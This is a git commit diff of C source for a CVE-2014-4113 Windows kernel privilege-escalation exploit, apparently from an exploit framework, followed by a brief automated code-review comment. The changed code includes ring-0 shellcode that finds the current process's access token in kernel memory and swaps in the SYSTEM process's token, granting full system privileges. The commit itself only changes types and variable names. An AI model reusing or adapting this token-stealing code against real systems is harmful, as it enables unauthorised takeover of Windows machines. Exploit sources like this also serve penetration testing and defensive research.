
Commit 8e547e2

committed
Use correct types
1 parent cd16ee8 commit 8e547e2


3 files changed

+29
-19
lines changed

Binary file not shown.
Binary file not shown.

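--- a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
@@ -24,6 +24,15 @@ typedef NTSTATUS *PNTSTATUS;
 
 #define PTR_SIZE sizeof(UINT_PTR)
 
+
+#ifdef _M_X64
+typedef DWORD64 MYWORD;
+typedef PDWORD64 PMYWORD;
+#else
+typedef DWORD MYWORD;
+typedef PDWORD PMYWORD;
+#endif
+
 typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
 IN HANDLE ProcessHandle,
 IN PVOID *BaseAddress,
@@ -137,27 +146,28 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
 
 
 // Search the specified data structure for a member with CurrentValue.
-BOOL find_and_replace_member(PDWORD pdwStructure, DWORD dwCurrentValue, DWORD dwNewValue, DWORD dwMaxSize)
+BOOL find_and_replace_member(PMYWORD Structure,
+MYWORD CurrentValue,
+MYWORD NewValue,
+MYWORD MaxSize)
 {
-DWORD dwIndex, dwMask;
+MYWORD i, Mask;
 
 // Microsoft QWORD aligns object pointers, then uses the lower three
 // bits for quick reference counting.
 #ifdef _M_X64
-dwMask = ~0xf;
+Mask = ~0xf;
 #else
-dwMask = ~7;
+Mask = ~7;
 #endif
-// dwMask out the reference count.
-dwCurrentValue &= dwMask;
+// Mask out the reference count.
+CurrentValue &= Mask;
 
-// Scan the structure for any occurrence of dwCurrentValue.
-for (dwIndex = 0; dwIndex < dwMaxSize; dwIndex++)
-{
-if ((pdwStructure[dwIndex] & dwMask) == dwCurrentValue)
-{
+// Scan the structure for any occurrence of CurrentValue.
+for (i = 0; i < MaxSize; i++) {
+if ((Structure[i] & Mask) == CurrentValue) {
 // And finally, replace it with NewValue.
-pdwStructure[dwIndex] = dwNewValue;
+Structure[i] = NewValue;
 return TRUE;
 }
 }
@@ -170,19 +180,19 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four)
 {
 void *pMyProcessInfo = NULL;
 void *pSystemInfo = NULL;
-PACCESS_TOKEN systemToken;
-PACCESS_TOKEN targetToken;
+PACCESS_TOKEN SystemToken;
+PACCESS_TOKEN TargetToken;
 
 pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo);
 pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
 
-TargetToken = pPsReferencePrimaryToken(pMyProcessInfo);
-SystemToken = pPsReferencePrimaryToken(pSystemInfo);
+TargetToken = pPsReferencePrimaryToken(pMyProcessInfo);
+SystemToken = pPsReferencePrimaryToken(pSystemInfo);
 
 // Find the token in the target process, and replace with the system token.
-find_and_replace_member((PDWORD)pMyProcessInfo,
-(DWORD)targetToken,
-(DWORD)systemToken,
+find_and_replace_member((PMYWORD)pMyProcessInfo,
+(MYWORD)TargetToken,
+(MYWORD)SystemToken,
 0x200);
 return 0;
 }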
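Review bot: The unchanged comment above the mask in find_and_replace_member says the lower three bits hold the reference count, but the `_M_X64` branch clears four bits with `Mask = ~0xf`, so the comment no longer describes both builds; something like `// The low bits of the stored pointer carry a reference count: 3 bits on x86, 4 bits on x64.` would match the code. The new `MYWORD`/`PMYWORD` typedefs in the first hunk duplicate the pointer-sized `DWORD_PTR`/`PDWORD_PTR` from the Windows headers (the file already uses `DWORD_PTR` and `UINT_PTR`), so the `#ifdef` block could be dropped in favour of those. `MaxSize` is compared against the element index `i`, so it is a count of pointer-sized slots rather than a byte size, and the function comment should state that unit. The body of find_and_replace_member continues past the end of its hunk.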
